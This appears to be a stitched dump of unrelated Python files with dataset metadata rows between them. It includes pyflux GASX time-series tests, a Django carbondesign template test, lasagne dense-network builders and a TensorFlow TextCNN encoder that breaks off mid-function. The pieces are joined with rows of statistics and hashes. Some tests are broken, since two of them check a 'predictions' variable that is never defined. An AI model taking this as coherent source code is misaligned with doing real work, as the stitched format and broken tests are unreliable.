sample = model.sample(nsims=100)
assert(sample.shape[0]==100)
assert(sample.shape[1]==len(data)-1)
def test_ppc():
"""
Tests PPC value
"""
model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
p_value = model.ppc()
assert(0.0 <= p_value <= 1.0)
## Try more than one predictor
def test2_exponential_no_terms():
"""
Tests the length of the latent variable vector for an GASX model
with no AR or SC terms, and two predictors, and tests that the values
are not nan
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=0, sc=0, family=pf.Exponential())
x = model.fit()
assert(len(model.latent_variables.z_list) == 3)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test2_exponential_couple_terms():
"""
Tests the length of the latent variable vector for an GASX model
with 1 AR and 1 SC term, and two predictors, and tests that the values
are not nan
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
assert(len(model.latent_variables.z_list) == 5)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test2_exponential_bbvi():
"""
Tests an GASX model estimated with BBVI, with multiple predictors, and
tests that the latent variable vector length is correct, and that value are not nan
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
assert(len(model.latent_variables.z_list) == 5)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test2_exponential_mh():
"""
Tests an GASX model estimated with MEtropolis-Hastings, with multiple predictors, and
tests that the latent variable vector length is correct, and that value are not nan
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('M-H', nsims=300)
assert(len(model.latent_variables.z_list) == 5)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test2_exponential_laplace():
"""
Tests an GASX model estimated with Laplace, with multiple predictors, and
tests that the latent variable vector length is correct, and that value are not nan
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('Laplace')
assert(len(model.latent_variables.z_list) == 5)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test2_exponential_pml():
"""
Tests an GASX model estimated with PML, with multiple predictors, and
tests that the latent variable vector length is correct, and that value are not nan
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('PML')
assert(len(model.latent_variables.z_list) == 5)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test2_exponential_predict_length():
"""
Tests that the length of the predict dataframe is equal to no of steps h
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
x.summary()
assert(model.predict(h=5, oos_data=data_oos).shape[0] == 5)
def test2_exponential_predict_is_length():
"""
Tests that the length of the predict IS dataframe is equal to no of steps h
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
assert(model.predict_is(h=5).shape[0] == 5)
def test2_exponential_predict_nans():
"""
Tests that the predictions are not NaNs
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
x.summary()
assert(len(model.predict(h=5, oos_data=data_oos).values[np.isnan(model.predict(h=5,
oos_data=data_oos).values)]) == 0)
def test2_exponential_predict_is_nans():
"""
Tests that the predictions in-sample are not NaNs
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit()
x.summary()
assert(len(model.predict_is(h=5).values[np.isnan(model.predict_is(h=5).values)]) == 0)
def test2_predict_nonconstant():
"""
We should not really have predictions that are constant (should be some difference)...
This captures bugs with the predict function not iterating forward
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
assert(not np.all(predictions.values==predictions.values[0]))
def test2_predict_is_nonconstant():
"""
We should not really have predictions that are constant (should be some difference)...
This captures bugs with the predict function not iterating forward
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
assert(not np.all(predictions.values==predictions.values[0]))
def test2_predict_intervals():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
model.fit()
predictions = model.predict(h=10, oos_data=data_oos, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_is_intervals():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
model.fit()
predictions = model.predict_is(h=10, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_intervals_bbvi():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
predictions = model.predict(h=10, oos_data=data_oos, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_is_intervals_bbvi():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
predictions = model.predict_is(h=10, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_intervals_mh():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('M-H', nsims=400)
predictions = model.predict(h=10, oos_data=data_oos, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_predict_is_intervals_mh():
"""
Tests prediction intervals are ordered correctly
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('M-H', nsims=400)
predictions = model.predict_is(h=10, intervals=True)
assert(np.all(predictions['99% Prediction Interval'].values > predictions['95% Prediction Interval'].values))
assert(np.all(predictions['95% Prediction Interval'].values > predictions['5% Prediction Interval'].values))
assert(np.all(predictions['5% Prediction Interval'].values > predictions['1% Prediction Interval'].values))
def test2_sample_model():
"""
Tests sampling function
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
sample = model.sample(nsims=100)
assert(sample.shape[0]==100)
assert(sample.shape[1]==len(data)-1)
def test2_ppc():
"""
Tests PPC value
"""
model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
x = model.fit('BBVI', iterations=100)
p_value = model.ppc()
assert(0.0 <= p_value <= 1.0)
| 42.22779 | 113 | 0.698835 | 2,795 | 18,538 | 4.56136 | 0.048658 | 0.101655 | 0.13554 | 0.056475 | 0.975135 | 0.973723 | 0.970743 | 0.966037 | 0.966037 | 0.947996 | 0 | 0.029054 | 0.147805 | 18,538 | 438 | 114 | 42.324201 | 0.777947 | 0.19247 | 0 | 0.765432 | 0 | 0 | 0.141671 | 0 | 0 | 0 | 0 | 0 | 0.320988 | 1 | 0.164609 | false | 0 | 0.012346 | 0 | 0.176955 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
692a1d1673c9e23e9a3c6c15e5f098a55c4c9838 | 9,240 | py | Python | carbondesign/tests/test_structured_list_html.py | dozymoe/django-carbondesign | 34aed0cfdccfa90fcb5bf2bbd347229815f1417b | [
"MIT"
] | null | null | null | carbondesign/tests/test_structured_list_html.py | dozymoe/django-carbondesign | 34aed0cfdccfa90fcb5bf2bbd347229815f1417b | [
"MIT"
] | null | null | null | carbondesign/tests/test_structured_list_html.py | dozymoe/django-carbondesign | 34aed0cfdccfa90fcb5bf2bbd347229815f1417b | [
"MIT"
] | null | null | null | # pylint:disable=missing-module-docstring,missing-class-docstring,missing-function-docstring
from django import forms
#-
from .base import compare_template, SimpleTestCase
class DummyForm(forms.Form):
services = forms.ChoiceField(required=False,
label="Number input label",
choices=(
('apache spark', "apache spark"),
('Cloudant', "Cloudant"),
('block-storage', "block-storage"),
('open-whisk', "open-whisk"),
))
class StructuredListHtmlTest(SimpleTestCase):
maxDiff = None
def test_default(self):
template = """
{% load carbondesign %}
{% Sl %}
{% Slot 'header' %}
{% SlTh %}Column1{% endSlTh %}
{% SlTh %}Column2{% endSlTh %}
{% endSlot %}
{% SlTr %}
{% SlTd nowrap=True %}Row 1{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
{% endSlTd %}
{% endSlTr %}
{% SlTr %}
{% SlTd nowrap=True %}Row 2{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
{% endSlTd %}
{% endSlTr %}
{% endSl %}
"""
expected = """
<section class="bx--structured-list">
<div class="bx--structured-list-thead">
<div class="bx--structured-list-row bx--structured-list-row--header-row">
<div class="bx--structured-list-th">Column1</div>
<div class="bx--structured-list-th">Column2</div>
</div>
</div>
<div class="bx--structured-list-tbody">
<div class="bx--structured-list-row">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 1
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
</div>
</div>
<div class="bx--structured-list-row">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 2
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
</div>
</div>
</div>
</section>
"""
rendered = compare_template(template, expected)
self.assertEqual(*rendered)
def test_selection(self):
form = DummyForm(data={'services': 'apache spark'})
context = {'form': form}
template = """
{% load carbondesign %}
{% SlSelect form.services %}
{% Slot 'header' %}
{% SlTh %}Column1{% endSlTh %}
{% SlTh %}Column2{% endSlTh %}
{% SlTh %}{% endSlTh %}
{% endSlot %}
{% SlTr value="apache spark" %}
{% SlTd nowrap=True %}Row 1{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
{% endSlTd %}
{% endSlTr %}
{% SlTr value="Cloudant" %}
{% SlTd nowrap=True %}Row 2{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
{% endSlTd %}
{% endSlTr %}
{% SlTr value="block-storage" %}
{% SlTd nowrap=True %}Row 3{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
{% endSlTd %}
{% endSlTr %}
{% SlTr value="open-whisk" %}
{% SlTd nowrap=True %}Row 4{% endSlTd %}
{% SlTd %}
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
{% endSlTd %}
{% endSlTr %}
{% endSlSelect %}
"""
expected = """
<section class="bx--structured-list bx--structured-list--selection"
data-structured-list>
<div class="bx--structured-list-thead">
<div class="bx--structured-list-row bx--structured-list-row--header-row">
<div class="bx--structured-list-th">Column1</div>
<div class="bx--structured-list-th">Column2</div>
<div class="bx--structured-list-th"></div>
</div>
</div>
<div class="bx--structured-list-tbody">
<label class="bx--structured-list-row bx--structured-list-row--selected" tabindex="0" aria-label="apache spark">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 1
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
</div>
<input tabindex="-1" class="bx--structured-list-input" value="apache spark"
type="radio" name="services" checked="" title="apache spark">
<div class="bx--structured-list-td">
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--structured-list-svg" width="16" height="16"
viewBox="0 0 16 16" aria-hidden="true">
<path d="M8,1C4.1,1,1,4.1,1,8c0,3.9,3.1,7,7,7s7-3.1,7-7C15,4.1,11.9,1,8,1z M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z"></path>
<path d="M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z" data-icon-path="inner-path" opacity="0"></path>
</svg>
</div>
</label>
<label class="bx--structured-list-row" tabindex="0" aria-label="Cloudant">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 2
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
</div>
<input tabindex="-1" class="bx--structured-list-input" value="Cloudant"
type="radio" name="services" title="Cloudant">
<div class="bx--structured-list-td">
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--structured-list-svg" width="16" height="16"
viewBox="0 0 16 16" aria-hidden="true">
<path d="M8,1C4.1,1,1,4.1,1,8c0,3.9,3.1,7,7,7s7-3.1,7-7C15,4.1,11.9,1,8,1z M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z"></path>
<path d="M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z" data-icon-path="inner-path" opacity="0"></path>
</svg>
</div>
</label>
<label class="bx--structured-list-row" tabindex="0" aria-label="block-storage">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 3
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue.
</div>
<input tabindex="-1" class="bx--structured-list-input" value="block-storage"
type="radio" name="services" title="block-storage">
<div class="bx--structured-list-td">
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--structured-list-svg" width="16" height="16"
viewBox="0 0 16 16" aria-hidden="true">
<path d="M8,1C4.1,1,1,4.1,1,8c0,3.9,3.1,7,7,7s7-3.1,7-7C15,4.1,11.9,1,8,1z M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z"></path>
<path d="M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z" data-icon-path="inner-path" opacity="0"></path>
</svg>
</div>
</label>
<label class="bx--structured-list-row" tabindex="0" aria-label="open-whisk">
<div class="bx--structured-list-td bx--structured-list-content--nowrap">
Row 4
</div>
<div class="bx--structured-list-td">
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc dui magna,
finibus id tortor sed, aliquet bibendum augue. Aenean posuere sem vel
euismod dignissim. Nulla ut cursus dolor. Pellentesque vulputate nisl a
porttitor interdum.
</div>
<input tabindex="-1" class="bx--structured-list-input" value="open-whisk"
type="radio" name="services" title="open-whisk">
<div class="bx--structured-list-td">
<svg focusable="false" preserveAspectRatio="xMidYMid meet"
xmlns="http://www.w3.org/2000/svg" fill="currentColor"
class="bx--structured-list-svg" width="16" height="16"
viewBox="0 0 16 16" aria-hidden="true">
<path d="M8,1C4.1,1,1,4.1,1,8c0,3.9,3.1,7,7,7s7-3.1,7-7C15,4.1,11.9,1,8,1z M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z"></path>
<path d="M7,11L4.3,8.3l0.9-0.8L7,9.3l4-3.9l0.9,0.8L7,11z" data-icon-path="inner-path" opacity="0"></path>
</svg>
</div>
</label>
</div>
</section>
"""
rendered = compare_template(template, expected, context)
self.assertEqual(*rendered)
| 39.656652 | 137 | 0.651082 | 1,332 | 9,240 | 4.512763 | 0.121622 | 0.125769 | 0.141075 | 0.150225 | 0.859591 | 0.845949 | 0.835468 | 0.812178 | 0.786225 | 0.767426 | 0 | 0.05473 | 0.177381 | 9,240 | 232 | 138 | 39.827586 | 0.736087 | 0.009848 | 0 | 0.779817 | 0 | 0.105505 | 0.910999 | 0.309753 | 0 | 0 | 0 | 0 | 0.009174 | 1 | 0.009174 | false | 0 | 0.009174 | 0 | 0.036697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c6129bf1f105fe800b8e84fa5d5aa6e689fa659e | 2,694 | py | Python | lib/nn.py | tonywu95/eval_gen | 7625f402ab6f61762ad4da6377acdf00577aea62 | [
"MIT"
] | 137 | 2016-11-28T03:50:20.000Z | 2021-06-08T02:20:13.000Z | lib/nn.py | tonywu95/eval_gen | 7625f402ab6f61762ad4da6377acdf00577aea62 | [
"MIT"
] | 3 | 2017-08-31T00:55:35.000Z | 2018-04-22T18:55:10.000Z | lib/nn.py | tonywu95/eval_gen | 7625f402ab6f61762ad4da6377acdf00577aea62 | [
"MIT"
] | 23 | 2016-12-03T15:28:04.000Z | 2021-02-02T04:45:27.000Z | import theano
import lasagne
tanh = lasagne.nonlinearities.tanh
sigmoid = lasagne.nonlinearities.sigmoid
linear = lasagne.nonlinearities.linear
nonlin = tanh
def gan_gen_net10():
network = lasagne.layers.InputLayer(shape=(None, 10))
network = lasagne.layers.DenseLayer(
network, 64, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 256, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 256, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 1024, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 784, nonlinearity=sigmoid)
return network
def vae_gen_net10():
network = lasagne.layers.InputLayer(shape=(None, 10))
network = lasagne.layers.DenseLayer(
network, 64, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 256, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 256, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 1024, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 784*2, nonlinearity=sigmoid)
return network
def enc_net10():
network = lasagne.layers.InputLayer(shape=(None, 784))
network = lasagne.layers.DenseLayer(
network, 256, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 64,nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 20,nonlinearity=linear)
return network
def gen_net50():
network = lasagne.layers.InputLayer(shape=(None, 50))
network = lasagne.layers.DenseLayer(network, 1024, nonlinearity=lasagne.nonlinearities.tanh)
network = lasagne.layers.DenseLayer(network, 1024, nonlinearity=lasagne.nonlinearities.tanh)
network = lasagne.layers.DenseLayer(network, 1024, nonlinearity=lasagne.nonlinearities.tanh)
network = lasagne.layers.DenseLayer(network, 784, nonlinearity=lasagne.nonlinearities.sigmoid)
return network
def enc_net50():
network = lasagne.layers.InputLayer(shape=(None, 784))
network = lasagne.layers.DenseLayer(
network, 1024, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 256, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 256, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 64, nonlinearity=nonlin)
network = lasagne.layers.DenseLayer(
network, 100, nonlinearity=linear)
return network
| 38.485714 | 98 | 0.679659 | 265 | 2,694 | 6.883019 | 0.120755 | 0.207237 | 0.296053 | 0.361842 | 0.869518 | 0.82182 | 0.82182 | 0.777412 | 0.777412 | 0.777412 | 0 | 0.043145 | 0.225687 | 2,694 | 69 | 99 | 39.043478 | 0.831256 | 0 | 0 | 0.721311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081967 | false | 0 | 0.032787 | 0 | 0.196721 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c61f0205a5e1699171579493fc16e7ce05e6d108 | 28,431 | py | Python | t2t_bert/model/textcnn/textcnn.py | yyht/bert | 480c909e0835a455606e829310ff949c9dd23549 | [
"Apache-2.0"
] | 34 | 2018-12-19T01:00:57.000Z | 2021-03-26T09:36:37.000Z | t2t_bert/model/textcnn/textcnn.py | yyht/bert | 480c909e0835a455606e829310ff949c9dd23549 | [
"Apache-2.0"
] | 11 | 2018-12-25T03:37:59.000Z | 2021-08-25T14:43:58.000Z | t2t_bert/model/textcnn/textcnn.py | yyht/bert | 480c909e0835a455606e829310ff949c9dd23549 | [
"Apache-2.0"
] | 9 | 2018-12-27T08:00:44.000Z | 2020-06-08T03:05:14.000Z | import tensorflow as tf
import numpy as np
from utils.bert import bert_modules
from utils.textcnn import textcnn_utils, dgcnn_utils, light_conv_utils
from utils.bimpm import match_utils
from utils.embed import integration_func
from model.base_classify import base_model
from utils.qanet import qanet_layers
from utils.qanet.qanet_layers import highway
from utils.dsmm.tf_common.nn_module import encode, attend, mlp_layer
from utils.bert import bert_utils
from utils.esim import esim_utils
from utils.textcnn import dynamic_light_cnn_utils
class TextCNN(base_model.BaseModel):
def __init__(self, config):
super(TextCNN, self).__init__(config)
def build_encoder(self, input_ids, input_char_ids, is_training, **kargs):
reuse = kargs["reuse"]
if is_training:
dropout_rate = self.config.dropout_rate
else:
dropout_rate = 0.0
# dropout_rate = tf.cond(is_training,
# lambda:self.config.dropout_rate,
# lambda:0.0)
word_emb_dropout = tf.nn.dropout(self.word_emb, 1)
with tf.variable_scope(self.config.scope+"_input_highway", reuse=reuse):
input_dim = word_emb_dropout.get_shape()[-1]
if self.config.get("highway", "dense_highway") == "dense_highway":
tf.logging.info("***** dense highway *****")
sent_repres = match_utils.multi_highway_layer(word_emb_dropout, input_dim, self.config.highway_layer_num)
elif self.config.get("highway", "dense_highway") == "conv_highway":
tf.logging.info("***** conv highway *****")
sent_repres = highway(word_emb_dropout,
size = self.config.num_filters,
scope = "highway",
dropout = dropout_rate,
reuse = reuse)
else:
sent_repres = word_emb_dropout
input_mask = tf.cast(tf.not_equal(input_ids, kargs.get('[PAD]', 0)), tf.int32)
input_len = tf.reduce_sum(tf.cast(input_mask, tf.int32), -1)
mask = tf.expand_dims(input_mask, -1)
sent_repres *= tf.cast(mask, tf.float32)
self.sent_repres = sent_repres
with tf.variable_scope(self.config.scope+"_encoder", reuse=reuse):
if kargs.get("cnn_type", 'textcnn') == 'textcnn':
self.output = textcnn_utils.text_cnn_v1(sent_repres,
self.config.get("filter_size", [1,3,5]),
"textcnn",
sent_repres.get_shape()[-1],
self.config.num_filters,
max_pool_size=self.config.max_pool_size,
input_mask=input_mask)
self.sequence_output = None
tf.logging.info("***** normal cnn *****")
elif kargs.get("cnn_type", 'textcnn') == 'multilayer_textcnn':
self.output = textcnn_utils.cnn_multiple_layers(sent_repres,
self.config.get("filter_size", [1,3,5]),
"textcnn",
sent_repres.get_shape()[-1],
self.config.num_filters,
max_pool_size=2,
input_mask=input_mask,
is_training_flag=is_training)
self.sequence_output = None
tf.logging.info("***** multi-layer cnn *****")
elif kargs.get("cnn_type", 'textcnn') == 'gated_cnn':
input_shape = bert_utils.get_shape_list(sent_repres, expected_rank=3)
hidden_size = self.config['cnn_num_filters']
input_width = input_shape[-1]
if input_width != hidden_size and self.config['cnn_residual']:
sent_repres = tf.layers.dense(
sent_repres,
hidden_size,
use_bias=None,
activation=None,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
tf.logging.info("==apply embedding linear projection==")
self.sequence_output = encode(sent_repres,
method=self.config["encode_method"],
input_dim=input_dim,
params=self.config,
sequence_length=input_len,
mask_zero=self.config["embedding_mask_zero"],
scope_name=self.scope + "enc_seq",
reuse=tf.AUTO_REUSE,
training=is_training)
print(self.sequence_output.get_shape(), '=====sequence_output shape=====')
pooled_output = []
for pooling_method in self.config['pooling_method']:
if pooling_method == 'avg':
seq_mask = tf.cast(mask, tf.float32)
avg_repres = tf.reduce_sum(self.sequence_output*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
pooled_output.append(avg_repres)
tf.logging.info("***** avg pooling *****")
elif pooling_method == 'max':
seq_mask = tf.cast(mask, tf.float32)
max_avg = tf.reduce_max(qanet_layers.mask_logits(self.sequence_output, seq_mask), axis=1)
pooled_output.append(max_avg)
tf.logging.info("***** max pooling *****")
self.output = tf.concat(pooled_output, axis=-1)
tf.logging.info("***** seq-encoder *****")
elif kargs.get("cnn_type", 'textcnn') == 'multilayer_gatedcnn':
input_shape = bert_utils.get_shape_list(sent_repres, expected_rank=3)
hidden_size = self.config['cnn_num_filters']
input_width = input_shape[-1]
if input_width != hidden_size and self.config['cnn_residual']:
sent_repres = tf.layers.dense(
sent_repres,
hidden_size,
use_bias=None,
activation=None,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
tf.logging.info("==apply embedding linear projection==")
self.sequence_output = textcnn_utils.gated_cnn(sent_repres,
input_mask,
num_layers=self.config['cnn_num_layers'],
num_filters=self.config['cnn_num_filters'],
filter_sizes=self.config['cnn_filter_sizes'],
bn=self.config['bn'],
training=is_training,
timedistributed=False,
scope_name="textcnn",
reuse=False,
activation=tf.nn.relu,
gated_conv=self.config['cnn_gated_conv'],
residual=self.config['cnn_residual'])
print(self.sequence_output.get_shape(), '=====sequence_output shape=====')
pooled_output = []
for pooling_method in self.config['pooling_method']:
if pooling_method == 'avg':
seq_mask = tf.cast(mask, tf.float32)
avg_repres = tf.reduce_sum(self.sequence_output*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
pooled_output.append(avg_repres)
tf.logging.info("***** avg pooling *****")
elif pooling_method == 'max':
seq_mask = tf.cast(mask, tf.float32)
max_avg = tf.reduce_max(qanet_layers.mask_logits(self.sequence_output, seq_mask), axis=1)
pooled_output.append(max_avg)
tf.logging.info("***** max pooling *****")
self.output = tf.concat(pooled_output, axis=-1)
tf.logging.info("***** seq-encoder *****")
elif kargs.get("cnn_type", 'textcnn') == 'multilayer_resnetcnn':
input_shape = bert_utils.get_shape_list(sent_repres, expected_rank=3)
hidden_size = self.config['cnn_num_filters']
input_width = input_shape[-1]
if input_width != hidden_size and self.config['cnn_residual']:
sent_repres = tf.layers.dense(
sent_repres,
hidden_size,
use_bias=None,
activation=None,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
tf.logging.info("==apply embedding linear projection==")
self.sequence_output = textcnn_utils.resnet_cnn(sent_repres,
input_mask,
num_layers=self.config['cnn_num_layers'],
num_filters=self.config['cnn_num_filters'],
filter_sizes=self.config['cnn_filter_sizes'],
bn=self.config['bn'],
training=is_training,
timedistributed=False,
scope_name="textcnn",
reuse=False,
activation=tf.nn.relu,
gated_conv=self.config['cnn_gated_conv'],
residual=self.config['cnn_residual'])
print(self.sequence_output.get_shape(), '=====sequence_output shape=====')
pooled_output = []
for pooling_method in self.config['pooling_method']:
if pooling_method == 'avg':
seq_mask = tf.cast(mask, tf.float32)
avg_repres = tf.reduce_sum(self.sequence_output*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
pooled_output.append(avg_repres)
tf.logging.info("***** avg pooling *****")
elif pooling_method == 'max':
